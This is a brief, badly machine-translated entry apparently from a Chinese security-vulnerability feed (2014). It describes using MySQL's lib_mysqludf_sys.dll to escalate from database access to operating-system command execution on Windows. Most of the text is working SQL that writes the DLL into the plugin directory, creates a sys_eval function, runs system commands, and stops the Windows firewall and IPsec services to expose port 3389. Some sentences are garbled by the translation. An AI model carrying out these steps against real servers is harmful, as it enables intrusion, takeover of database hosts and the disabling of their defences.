SqlMap of mysql udf.dll provide right-vulnerability warning-the black bar safety net

2014-09-07T00:00:00
ID MYHACK58:62201453367
Type myhack58
Reporter 佚名
Modified 2014-09-07T00:00:00

Description

First upload the dll file to any directory, such as: D:/RECYCLER/lib_mysqludf_sys.dll

Import the dll,according to the version of the import to windows or the mysql plugin directory(typically executing a select @@plugin_dir can be seen in the plugin directory specific path) select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_mysqludf_sys.dll’ (a higher version will need to import the above query to the plugin directory)

CREATE function: create function sys_eval returns string soname ‘lib_mysqludf_sys.dll’;

Perform the command: select sys_eval(‘whoami’);

The General case does not appear to create unsuccessful.

On 3 3 8 9 can first stop the windows Firewall and filter

select sys_eval(‘net stop policyagent’); select sys_eval(‘net stop sharedaccess’);